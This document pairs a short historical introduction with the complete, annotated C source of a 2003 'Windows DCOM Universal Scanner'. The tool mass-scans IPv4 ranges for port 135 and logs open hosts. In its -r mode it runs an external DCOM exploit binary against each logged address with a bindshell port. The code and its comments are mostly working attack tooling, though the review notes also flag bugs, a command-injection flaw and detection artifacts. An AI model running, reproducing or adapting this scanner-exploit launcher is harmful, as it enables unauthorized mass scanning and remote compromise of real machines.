This tool is old, but it is an example of how even novice practitioners can have a damaging impact on computer systems.
It was used by several underground groups and purportedly compromised a seven-figure number of computer systems around the world at the time of the infamous DCOM vulnerability in 2003/2004.
It relies on advanced exploitation and bug-discovery work by other groups, but it was prepared ahead of the public release: the Polish group who discovered the bug announced it roughly three weeks before dropping the 0day. Surely this group was not the only one with such tools ready to go, with further payloads for after a shell was acquired 😉
Before the advent of services like Shodan, groups would pre-scan large address ranges if they knew something was coming and/or they were on the cusp of finding vulnerabilities in a particular service. ISPs were not so strict back then, so you could easily do this from home without issues.
DCOM changed the way ISPs looked at port-scanning policies. While port scanning did not violate national laws, they felt it was their moral duty to prevent enumeration techniques as much as possible.
/******************************Windows DCOM Universal Scanner************************\\\\\\\\\\\\
* Coded by Dominatus<[email protected]> \
* \
* This exploit was found by LSD<www.lsd-pl.net> \
* The program to exploit Win2k and WinXP universally was oc192.us Security. \
* I wrote this scanner though, which is what you are looking at right now. \
* \
* Please stop by irc.undernet.org/#kracknet and check out www.kracknet.org(which isn't finished\
* yet), and please check out www.hbx.us, which has free shell accounts, and currently hairball \
* needs some money to keep it up, so please help if you use his services. Check out *
* www.skope6.com, we're a new security group. We post a lot of computer and security *
* information. Come talk with us at irc.undernet.org/#skope6 *
* *
\ *
\ Note: Some ISPs block port 135, so you may have problems finding machines on certain ranges *
\ *
\ What this program does is either scan for machines with <port> open, with the option to log *
\ them to a file, or root the vulnerable IPs from a logfile from a scan, and exploits the OS *
\ you choose. *
\ *
\ YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU DO WITH THIS PROGRAM *
\\\\\\\\\\\\\***********************************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
/* Values of struct connection.status. */
#define ACTIVE 1
#define NOT_ACTIVE 0
/* Number of scan slots, i.e. the maximum number of non-blocking connects
 * kept in flight at once. */
#define MAXIMUM_SOCKS 200
/* One scan slot. */
struct connection
{
int sock; /* socket descriptor; keeps its old value after the slot is closed */
char status; /* ACTIVE while a connect is in flight, otherwise NOT_ACTIVE */
time_t scan_time; /* when the connect was started; drives the -t timeout */
struct sockaddr_in addr; /* target address and port */
};
/* Static storage: every field starts zeroed, so an unused slot has
 * sock == 0 until main() assigns it a real descriptor. */
struct connection ConnectionList[MAXIMUM_SOCKS];
void catchsig(); /* SIGINT handler, installed by main() in scan mode */
void initialize_connection(char *logFile); /* reset all slots and print the banner */
void check_connection(char logFile[256]); /* one polling pass over the slots */
void rootlog(char *logFile); /* -r mode: run ./oc192-dcom once per logged host */
/*
 * Print the banner and the command-line help to stderr, then terminate
 * the process with status 0. Never returns.
 *
 * argv0: program name, substituted into the usage line and the examples.
 */
void usage(char *argv0)
{
    /* Fixed text printed before the usage line. */
    static const char *const head[] = {
        "\n\n\n Windows DCOM Universal Scanner\n",
        " Coded by Dominatus<[email protected]>\n\n",
        " A Production of Skope6 Research Group\n",
        " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n",
        "==============================================================================================================\n",
        "+-- Skope6 Team: dominatus, sybah, eaglex, icecow, hairball, deversify, provizon, brotroxer, and lazurus --+\n",
        "==============================================================================================================\n\n",
        "**************************************************************************\n",
        "Usage:\n\n",
    };
    /* Option descriptions printed after the usage line. */
    static const char *const options[] = {
        "[IP]: IP to begin scanning at (1.0.0.0 - 255.255.255.255)\n",
        "-p <port>: Scan/exploit hosts on this port number(default: 135)\n",
        "-t <timeout>: Timeout in seconds for sockets(default: 5)\n",
        "-r <logfile>: Root the servers from a -l <logfile>\n",
        "-l <logfile>: Log hosts with port (default: 135) open in a logfile\n",
        "-b <port>: Bindshell port(default: 666)\n",
        "-s <selection>: Pick which OS you would like to exploit\n",
        " Targets: (use this only with option -r <logfile>)\n",
        " 0 Windows 2000 (Universal)\n",
        " 1 Windows XP (Universal)(default)\n",
        "**************************************************************************\n\n",
        "Examples:\n\n",
    };
    size_t k;

    for (k = 0; k < sizeof head / sizeof head[0]; k++)
        fputs(head[k], stderr);
    /* Only these three lines interpolate the program name. */
    fprintf(stderr, "%s [IP] <-p> <-t> <-r> <-l> <-b> <-s>\n\n", argv0);
    for (k = 0; k < sizeof options / sizeof options[0]; k++)
        fputs(options[k], stderr);
    fprintf(stderr, "%s 207.0.0.1 -l vulnhosts.txt\n", argv0);
    fprintf(stderr, "%s -r vulnhosts.txt -s 0 -p 136\n\n", argv0);
    exit(0);
}
/* Current target address, one int per octet; seeded from argv[1] by the
 * sscanf() in main() (defaults to 1.0.0.0) and advanced host by host by
 * the scan loop. */
int startA = 1, startB = 0, startC = 0, startD = 0;
int port = 135; /* -p: TCP port to connect to; also forwarded to oc192-dcom in -r mode */
int root = 0; /* -r given: run rootlog() instead of scanning */
/* -l given: append reachable hosts to logfile instead of printing them.
 * NOTE(review): this identifier is the same as log() from <math.h>; the
 * file does not include that header, but adding it would conflict. */
int log = 0;
int selection = 1; /* -s: 0 = win2k, 1 = winxp; passed through as oc192-dcom's -t value */
int timeout = 5; /* -t: seconds before an in-flight connect is abandoned */
int bindport = 666; /* -b: forwarded as oc192-dcom's -l value */
/* -l/-r path. Filled by strncpy() in main() with the full buffer size, so
 * a path of 256 bytes or more is stored without a terminator. */
char logfile[256];
char *win2k = "Windows 2000 (Universal)"; /* display names used by rootlog() */
char *winxp = "Windows XP (Universal)";
/*
 * Entry point: parse the command line, then either scan forward from the
 * start address (default) or, with -r, hand the log file to rootlog().
 *
 * argv[1] is parsed as the dotted-quad start address before getopt() runs,
 * so it is positional. Options: -p port, -t timeout, -r logfile (run
 * rootlog), -l logfile (log reachable hosts), -s target selection,
 * -b bindshell port.
 *
 * Scan mode keeps up to MAXIMUM_SOCKS non-blocking connects in flight to
 * `port` and advances the target one host at a time with carry across the
 * four octets; check_connection() reaps results and timeouts on every
 * pass. A sequential sweep of one TCP port from a single source like this
 * is a very recognisable pattern in flow or firewall logs.
 *
 * Review notes:
 *  - atoi(), exit() and inet_addr() are used without <stdlib.h> or
 *    <arpa/inet.h>; the file relies on implicit declarations.
 *  - sscanf() and atoi() results are never checked: unmatched octets keep
 *    their file-scope defaults and a non-numeric option value becomes 0.
 *  - strncpy() into logfile[256] with the full buffer size leaves the path
 *    unterminated when optarg is 256 bytes or longer; fopen() and
 *    rootlog() then read past the buffer.
 */
int main(int argc, char *argv[])
{
int done = 0; /* never assigned: the loop below ends only through exit() */
int i;
int k; /* unused */
int ns; /* unused */
int ret;
int opt;
char IP[16]; /* dotted quad text: at most 15 characters plus NUL */
time_t scan_time; /* assigned below but never read */
FILE *logFile;
if (argc < 2)
{
usage(argv[0]);
}
/* Parsed before the options; in the -r example from usage() argv[1] is
 * "-r" and simply matches nothing. The return value is ignored. */
sscanf(argv[1], "%d.%d.%d.%d", &startA, &startB, &startC, &startD);
while ((opt = getopt(argc, argv, "p:t:r:l:s:b:")) != EOF)
{
switch (opt)
{
case 'p':
port = atoi(optarg); /* unchecked: non-numeric input becomes port 0 */
break;
case 't':
timeout = atoi(optarg);
break;
case 'r':
/* Full-size strncpy(): no terminator if optarg fills the buffer. */
strncpy(logfile, optarg, sizeof(logfile));
/* Opened only to verify the file exists; the mode is "r+" although the
 * message says "append". */
logFile = fopen(logfile, "r+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
root = 1;
break;
case 'l':
if (optarg == NULL)
usage(argv[0]);
strncpy(logfile, optarg, sizeof(logfile)); /* same termination caveat as -r */
logFile = fopen(logfile, "a+"); /* creates the file if needed */
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
log = 1;
break;
case 's':
selection = atoi(optarg);
break;
case 'b':
bindport = atoi(optarg);
break;
case '?':
usage(argv[0]);
break;
default:
usage(argv[0]);
}
}
/* Scan mode only: reject a start address longer than a dotted quad. */
if (!root)
if (strlen(argv[1]) > 15)
usage(argv[0]);
/* Prints the banner before the -l/-r conflict check below runs. */
initialize_connection(logfile);
scan_time = time(0);
if (log && root)
{
fprintf(stderr, "You can\'t use the -l(log) and -r(root hosts from log) together\n");
exit(1);
}
/* Range-check the parsed octets; the first octet must be at least 1. */
if (!root)
{
if (startA > 255 || startB > 255 || startC > 255 || startD > 255)
usage(argv[0]);
if (startA < 1 || startB < 0 || startC < 0 || startD < 0)
usage(argv[0]);
}
/* rootlog() ends the process itself, so the SIGINT handler is only ever
 * installed for scan mode. */
if (root)
rootlog(logfile);
else
signal(SIGINT, catchsig);
while (!done)
{
/* Fill every free slot with a connect to the next target. */
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if (ConnectionList[i].status == NOT_ACTIVE)
{
/* A socket() failure (e.g. descriptor limit) is silently skipped;
 * the slot is retried on the next pass. */
ConnectionList[i].sock = socket(AF_INET, SOCK_STREAM, 0);
if (ConnectionList[i].sock != -1)
{
/* Non-blocking so connect() returns at once; check_connection()
 * polls for the outcome. */
ret = fcntl(ConnectionList[i].sock, F_SETFL, O_NONBLOCK);
if (ret == -1)
{
fprintf(stderr, "Unable to set O_NONBLOCK\n");
close(ConnectionList[i].sock);
}
else
{
memset((char *)IP, 0, sizeof(IP));
snprintf(IP, sizeof(IP), "%d.%d.%d.%d", startA, startB, startC, startD);
/* inet_addr() returns in_addr_t; the -1 compare works because -1
 * converts to INADDR_NONE. The literal 255.255.255.255 encodes to
 * the same value and is therefore rejected here too. */
ConnectionList[i].addr.sin_addr.s_addr = inet_addr(IP);
if (ConnectionList[i].addr.sin_addr.s_addr == -1)
{
fprintf(stderr, "\nInvalid IP\n");
exit(1);
}
ConnectionList[i].addr.sin_family = AF_INET;
ConnectionList[i].addr.sin_port = htons(port);
ConnectionList[i].scan_time = time(0);
ConnectionList[i].status = ACTIVE; /* connect() itself happens in check_connection() */
/* Advance to the next host, carrying into C, B and A. The sweep
 * ends once the last octet of A would pass 255. */
startD++;
if (startD == 256)
{
if (startC < 255)
{
startD = 0;
startC++;
}
else
{
if (startB < 255)
{
startD = 0;
startC = 0;
startB++;
}
else
{
if (startA < 255)
{
startD = 0;
startC = 0;
startB = 0;
startA++;
}
else
{
fprintf(stderr, "Finished\n");
/* Closes every slot, NOT_ACTIVE ones included: unused slots still
 * hold sock == 0 (static storage), so this also closes stdin, and
 * reaped slots hold stale descriptor numbers. */
for (i = 0; i < MAXIMUM_SOCKS; i++)
close(ConnectionList[i].sock);
exit(0);
}
}
}
}
}
}
}
}
/* Reap completed and timed-out slots before refilling. */
check_connection(logfile);
}
}
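/*
 * SIGINT handler installed by main() in scan mode: release every open
 * scan socket and terminate with status 0. Never returns.
 *
 * sig: the delivered signal number; unused, but the parameter makes the
 *      definition match the void (*)(int) type signal() expects (the
 *      prototype above declares it with empty parentheses).
 *
 * Only async-signal-safe calls are used here (write(), close(), _exit()).
 * fprintf()/exit() are not, and this handler can interrupt the stdio
 * calls in main()'s loop. Only ACTIVE slots are closed: slots never used
 * still hold sock == 0 (the array is static storage) and slots already
 * reaped by check_connection() hold a stale descriptor number, so closing
 * them blindly would hit stdin or an unrelated descriptor.
 */
void catchsig(int sig)
{
    static const char caught[] = "\n\nCtrl+C caught\nClosing Connections...\n";
    static const char closed[] = "Connections Successfully Closed\n";
    ssize_t rc;

    (void)sig;
    rc = write(STDERR_FILENO, caught, sizeof caught - 1);
    for (int i = 0; i < MAXIMUM_SOCKS; i++) {
        if (ConnectionList[i].status == ACTIVE) {
            close(ConnectionList[i].sock);
        }
    }
    rc = write(STDERR_FILENO, closed, sizeof closed - 1);
    (void)rc; /* nothing sensible to do if stderr is unwritable while shutting down */
    _exit(0);
}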
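/*
 * Reset every scan slot to NOT_ACTIVE and print the start-up banner.
 *
 * logFile: unused; kept so the prototype and the call in main() stay
 *          unchanged.
 *
 * Fix: the banner used to print the literal "Port: 135" regardless of -p;
 * it now reports the configured `port`. Slots also start with sock = -1,
 * so the close-everything paths elsewhere hit EBADF on unused slots
 * instead of closing descriptor 0 (stdin), which a zeroed slot names.
 */
void initialize_connection(char *logFile)
{
    (void)logFile;
    for (int i = 0; i < MAXIMUM_SOCKS; i++) {
        ConnectionList[i].sock = -1;
        ConnectionList[i].status = NOT_ACTIVE;
        memset(&ConnectionList[i].addr, 0, sizeof ConnectionList[i].addr);
    }
    fprintf(stderr, " Windows DCOM Universal Scanner\n");
    fprintf(stderr, " coded by Dominatus<[email protected]>\n\n");
    fprintf(stderr, " A Production of Skope6 Research Group\n");
    fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n\n");
    if (!root) {
        /* getopt() has already run in main(), so `port` and `timeout`
         * hold the values the scan will actually use. */
        fprintf(stderr, "Starting scan from %d.%d.%d.%d Port: %d Timout: %d second(s)\n", startA, startB, startC, startD, port, timeout);
        fprintf(stderr, "Press Ctrl+C to stop or Ctrl+Z to suspend\n\n");
    }
}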
/*
 * One polling pass over ConnectionList: expire slots older than `timeout`
 * seconds, re-issue connect() on the in-flight ones, and report or log the
 * hosts whose connection completed.
 *
 * logFile: path of the -l log; consulted only when the `log` flag is set.
 *
 * Review notes:
 *  - A host whose connect completes on a later pass is detected through
 *    EISCONN below and is written to stderr only; the `log` flag is
 *    checked only in the immediate-success branch (ret == 0).
 *  - After the EISCONN branch closes the socket, the following `if` also
 *    fires (EISCONN is neither EALREADY nor EINPROGRESS, and a successful
 *    close() leaves errno alone in practice), so close() runs a second
 *    time on the same, already closed descriptor.
 *  - fopen() of the log is unchecked; fprintf() would receive a NULL
 *    stream if the file became unwritable after start-up.
 */
void check_connection(char logFile[256])
{
int i;
int ret;
int selectionCheck = selection; /* unused */
char IPaddress[16]; /* dotted quad: 15 characters plus NUL */
FILE *logf;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
/* Timeout: abandon slots whose connect started more than `timeout`
 * seconds ago and free them for the next target. */
if ((ConnectionList[i].scan_time < (time(0) - timeout)) && (ConnectionList[i].status == ACTIVE))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
else if (ConnectionList[i].status == ACTIVE)
{
memset(ConnectionList[i].addr.sin_zero, 0, 8);
/* Non-blocking socket: connect() is re-issued on every pass and reports
 * progress through errno (EINPROGRESS/EALREADY while pending, EISCONN
 * once established). */
ret = connect(ConnectionList[i].sock, (struct sockaddr *)&ConnectionList[i].addr, sizeof(struct sockaddr_in));
/* inet_ntoa() returns a static buffer; copied before anything else can
 * overwrite it. A dotted quad always fits with its terminator, so this
 * strncpy() does terminate. */
strncpy(IPaddress, (char *)inet_ntoa(ConnectionList[i].addr.sin_addr), sizeof(IPaddress));
if (ret == -1)
{
if (errno == EISCONN)
{
/* Connection established on a later pass. The second argument has no
 * matching conversion and is evaluated but ignored (presumably a
 * leftover elapsed-time print). Not written to the -l log. */
fprintf(stderr, "%s\n", IPaddress, (time(0) - ConnectionList[i].scan_time));
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
/* Anything other than "still connecting" (refused, unreachable, and
 * the EISCONN case just handled) releases the slot. */
if ((errno != EALREADY) && (errno != EINPROGRESS))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
else
{
/* connect() succeeded immediately (uncommon for a non-blocking socket). */
if (log)
{
logf = fopen(logFile, "a+"); /* unchecked */
fprintf(logf, "%s\n", IPaddress);
fclose(logf);
}
else
fprintf(stderr, "Host: %s\n", IPaddress);
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
}
}
/*
 * -r mode: read one host per line from logFile and run the external
 * ./oc192-dcom program (relative to the current directory) against it
 * through system(). Ends the process with exit(0); never returns.
 *
 * logFile: path whose readability main() already checked; reopened here.
 *
 * Review notes (the tool's own exposure):
 *  - fopen() is unchecked; if the file disappeared after main() checked
 *    it, fgets() is called on a NULL stream.
 *  - fgets() keeps the trailing newline, and the raw line is interpolated
 *    unescaped into a /bin/sh command line. The newline ends the
 *    ./oc192-dcom command early (the -t/-p/-l options become a second
 *    command), and any other shell metacharacters in the log file are
 *    interpreted by the shell: the log file is untrusted input feeding
 *    system(). From an incident-response view the sh -c → ./oc192-dcom
 *    process chain is the observable artifact of this mode.
 *  - snprintf() truncation into exploitString[256] is not checked.
 *  - Both branches build identical commands; only the banner differs.
 *  - system() is used without <stdlib.h> (implicit declaration).
 */
void rootlog(char *logFile)
{
int selectionCheck = selection; /* -s value: 0 = win2k, 1 = winxp; anything else is reported per line */
char IPaddress[256]; /* one log line, newline included */
char exploitString[256];
FILE *logf;
logf = fopen(logFile, "r+"); /* unchecked; "r+" although only read here */
fprintf(stderr, "\nHold Ctrl+C to quit\n");
/* Lines longer than 255 bytes are split across several iterations. */
while ((fgets(IPaddress, sizeof(IPaddress), logf)) != NULL)
{
if (selectionCheck == 0)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, win2k);
system(exploitString); /* blocks until the child exits; status ignored */
}
else if (selectionCheck == 1)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, winxp);
system(exploitString); /* blocks until the child exits; status ignored */
}
else
fprintf(stderr, "\nSomething Failed\n"); /* unsupported -s value, printed once per line */
}
fprintf(stderr, "\nFinished\n");
exit(0); /* main() never reaches its scan loop in -r mode */
}